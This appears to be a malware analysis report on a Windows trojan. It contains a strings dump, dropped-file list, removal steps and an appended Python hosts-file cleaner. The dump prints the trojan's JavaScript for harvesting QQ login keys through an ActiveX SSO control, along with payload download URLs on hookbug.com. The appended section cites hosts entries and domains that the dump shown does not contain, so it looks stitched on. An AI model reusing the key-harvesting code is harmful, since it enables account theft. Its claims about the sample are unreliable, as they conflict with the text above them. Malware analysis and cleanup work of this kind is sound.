return binl2hex(core_md5(str2binl(A), A.length * chrsz))
return binl2str(core_md5(str2binl(A), A.length * chrsz))
for (var C = 0; C < K.length; C += 16) {
for (var B = 0; B < D.length * chrsz; B += chrsz) {C[B >> 5] |= (D.charCodeAt(B / chrsz) & A) << (B % 32)
for (var B = 0; B < C.length * 32; B += chrsz) {D += String.fromCharCode((C[B >> 5] >>> (B % 32)) & A)
for (var A = 0; A < C.length * 4; A++) {D += B.charAt((C[A >> 2] >> ((A % 4) * 8 + 4)) & 15) + B.charAt((C[A >> 2] >> ((A % 4) * 8)) & 15)
for (var i = 0; i < str.length; i = i + 2) {arr.push("\\x" + str.substr(i, 2))
arr = arr.join("");
return(Math.random());
return(date.getTime());
http://www.hixxg.com/
\QQShow.dll
5B3838F5-0C81-46D9-A4C0-6EA28CA3E942_
275816125
2286585953
1149544
*.bak
*.rar
10.0.4
http://blog.sina.com.cn/s/blog_b61e00f001016mtd.html
%System%\Configuration file.ini
%swtV!
%sw8H!
%sw04!
%sw 4!
%sw<(!
%swP.
.rw!~#
S.gzw
Sqlv
Bd .Cd =Cd [Bd MCd
urlmon.dll
unrar.dll
URLDownloadToCacheFileA
URLDownloadToFileA
RARSetPassword
[unprintable data]
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
http://www.hookbug.com:5151/jwxx.rar
`.rdata
@.reloc
%.*s(%d)%s
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb
GetCPInfo
KERNEL32.dll
ADVAPI32.dll
GetConsoleOutputCP
jwxx.rar
jwxx.exe
http://www.hookbug.com:5151/new_mf.html
[unprintable data]
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
GetProcessHeap
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
ShellExecuteA
SHELL32.dll
OLEAUT32.dll
WININET.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
#include "l.chs\afxres.rc" // Standard components
=f%7s
http://shang.qq.com/wpa/qunwpa?idkey=f67ec2ba2cd402abd4c0bc9d75ca8854c46a5486eab2f0e310dc7d29e32ea85d
.data
[unprintable format-string data]
GetAsyncKeyState
{B6F7542F-B8FE-46a8-9605-98856A687097}
http://www.hookbug.com:5151/vip/
-Www.52jwxx.Com
00000000000000000000000d
-WWW.HIXXG.COM
00 00 17 01
http://www.hookbug.com:5151
*.dll
[unprintable data]
50,100,150
http://www.hookbug.com:5151/jiezhi/
WWW.52JWXX.COM
Kernel32.dll
197774811
http://www.hookbug.com:5151/qunb.html
http://www.hookbug.com:5151/qq.html
http://www.hookbug.com:5151/vip.rar
http://www.hixxg.com/xiazai.html
http://bbs.52jwxx.com/
WWW.HIXXG.COM
www.hixxg.com
%*.*f
windows
MSWHEEL_ROLLMSG
RASAPI32.dll
GetWindowsDirectoryA
EnumChildWindows
oledlg.dll
WSOCK32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
QQShow.dll
197774811
0.0.0.0
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&clientkey=
http://ptlogin2.qq.com/jump?clientuin=
QQnologin
SSOAxCtrlForPTLogin.SSOForPTLogin2
http://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g [truncated in dump]
WinHttp.WinHttpRequest.5.1
for(var i=0,len=str.length;i [truncated in dump]
hash += (hash << 5) + str.charCodeAt(i);
skey=
&ua=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322)
http://qun.qzone.qq.com/cgi-bin/get_group_list?groupcount=4&count=4&callbackFun=_GetGroupPortal&uin=
http://
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
var jie = document.createStyleSheet();jie.addRule('html','overflow:hidden;');
text|password|file
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
http://www.hookbug.com:5151/
http://www.hookbug.com:5151/qunb.html
http://www.hookbug.com:5151/qq.html
www.soso.com
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
[unprintable data]
%d]%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV(*.WAV)|*.WAV|MIDI(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG(*.JPG)|*.JPG|BMP(*.BMP)|*.BMP|GIF(*.GIF)|*.GIF|(*.ICO)|*.ICO|(*.CUR)|*.CUR|
%s:%d
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
%d / %d
Bogus message code %d
(%d-%d):%ld%c
www.dywt.com.cn
(*.htm;*.html)|*.htm;*.html
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
c:\%original file name%.exe
1, 0, 6, 6
Skin.dll
rtmp%d
Crypt32.dll
mscoree.dll
4.20.0
Unrar.dll
(*.*)
1.0.0.0
[unprintable data]
\e.exe
8.1.0.0
WWW.52JWXX.COM
WWW.52JWXX.COM
%original file name%.exe_1368_rwx_00401000_000D6000:
t$(SSh~%UVWu$SShe
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\btn_del[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\pb_v.min.1.9[1].js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sugg_ajaj.v.5.2[2].js (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1.6.min[1].js (5296 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\logo_index[1].png (1797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\fav[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3F.tmp (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@soso[2].txt (330 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (304 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\link[1].jpg (1190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\link[1].jpg (2870 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\40.tmp (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\year[1].jsp (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\year[1].jsp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\button_10[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\qunb[1].htm (258 bytes)
%System%\drivers\etc\hosts (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (606 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@soso[1].txt (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sugg_ajaj.v.5.2[1].js (1785 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\soso[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ico_icp[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\soso[1] (600 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\icon_index[1].png (440 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\q[1].htm (5797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\group[1].png (1 bytes)
C:\¾¢Îèææ-Ψһ¹ÙÃÂø.url (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ico_src[1].png (2623 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pb_v.min.1.9[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\q[1].se&unc=&query=¾¢Îèææ (5370 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\41.tmp (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1.6.min[2].js (5776 bytes)
C:\ʹÓñؿ´.txt (4 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (6748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\logo130826[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\soso[1].htm (383 bytes)
C:\VIPææ-¹ºÂòô½Ó.url (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\qq[1].htm (229 bytes)
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
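The hosts-file text in the strings dump and the %System%\drivers\etc\hosts entry in the file list show what the sample writes: every listed hostname is pinned to 127.0.0.1, so the victim's browser can no longer reach those sites, and the one entry that carries a path (www.vdisk.cn/au2012fuzhu) can never match a hosts lookup at all, which makes it a reliable tell for this hand-written blocklist. The Python below is an added example, not part of the Lavasoft report or of the sample, that audits a hosts file for this pattern and rebuilds a clean copy that keeps the comment header and the stock 127.0.0.1 localhost line, as the restore step above requires. The sample input is the hosts content quoted in the strings dump; the file on a live system is %SystemRoot%\System32\drivers\etc\hosts, and writing it needs administrator rights.

```python
"""Audit a Windows hosts file for the sinkhole entries this sample writes and
rebuild a clean copy (added example, not from the report or the sample)."""
import ipaddress
from typing import List, Tuple

# Hostnames from the hosts-file text in the sample's strings dump.
SAMPLE_DOMAINS = {
    "52jwyy.com", "www.52jwyy.com", "bbs.52jwyy.com",
    "au2014.com", "www.au2014.com",
    "92ausf.com", "www.92ausf.com",
    "92jwyy.taobao.com", "shop105942574.taobao.com",
    "jwyywg.d131.tqxq.com", "www.jwyywg.d131.tqxq.com",
    "audition0538.i.sohu.com", "audition0538.blog.sohu.com",
    "www.vdisk.cn/au2012fuzhu",
    "9421mm.com", "www.9421mm.com",
}

# Constructed input: the hosts content quoted in the strings dump.
SAMPLE_HOSTS = """\
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.1 52jwyy.com
127.0.0.1 www.52jwyy.com
127.0.0.1 bbs.52jwyy.com
127.0.0.1 au2014.com
127.0.0.1 www.au2014.com
127.0.0.1 92ausf.com
127.0.0.1 www.92ausf.com
127.0.0.1 92jwyy.taobao.com
127.0.0.1 shop105942574.taobao.com
127.0.0.1 jwyywg.d131.tqxq.com
127.0.0.1 www.jwyywg.d131.tqxq.com
127.0.0.1 audition0538.i.sohu.com
127.0.0.1 www.vdisk.cn/au2012fuzhu
127.0.0.1 audition0538.blog.sohu.com
127.0.0.1 9421mm.com
127.0.0.1 www.9421mm.com
"""

Entry = Tuple[int, str, List[str]]    # (line number, address, hostnames)
Finding = Tuple[int, str, str, str]   # (line number, address, hostname, reason)


def parse_hosts(text: str) -> List[Entry]:
    """Active mappings only; '#' comments (whole-line or trailing) and blanks are dropped."""
    entries = []
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        entries.append((number, fields[0], fields[1:]))
    return entries


def suspicious_entries(text: str) -> List[Finding]:
    """Flag every mapping except a loopback localhost line."""
    findings = []
    for number, address, names in parse_hosts(text):
        try:
            ip = ipaddress.ip_address(address)
        except ValueError:
            findings.append((number, address, " ".join(names), "malformed address"))
            continue
        for name in names:
            if name.lower() == "localhost" and ip.is_loopback:
                continue
            reasons = []
            if name.lower() in SAMPLE_DOMAINS:
                reasons.append("domain written by this sample")
            if "/" in name:
                # A path never matches a hosts lookup, so this is a copied
                # blocklist line, not an administrator's entry.
                reasons.append("path in hostname")
            if ip.is_loopback or ip.is_unspecified:
                reasons.append("sinkholed to " + address)
            if reasons:
                findings.append((number, address, name, "; ".join(reasons)))
    return findings


def clean_hosts(text: str) -> str:
    """Drop every flagged line, keep comments, and make sure localhost survives."""
    bad_lines = {finding[0] for finding in suspicious_entries(text)}
    kept = [raw for n, raw in enumerate(text.splitlines(), 1) if n not in bad_lines]
    has_localhost = any("localhost" in names for _, _, names in parse_hosts("\n".join(kept)))
    if not has_localhost:
        kept.append("127.0.0.1 localhost")
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    for number, address, name, reason in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {number}: {address} {name}  <- {reason}")
    print(clean_hosts(SAMPLE_HOSTS), end="")
```

Review the findings before writing the result back: the sinkhole rule also trips on a hosts-based ad blocker or on intentional 0.0.0.0 entries, so only the "domain written by this sample" and "path in hostname" reasons are specific to this infection.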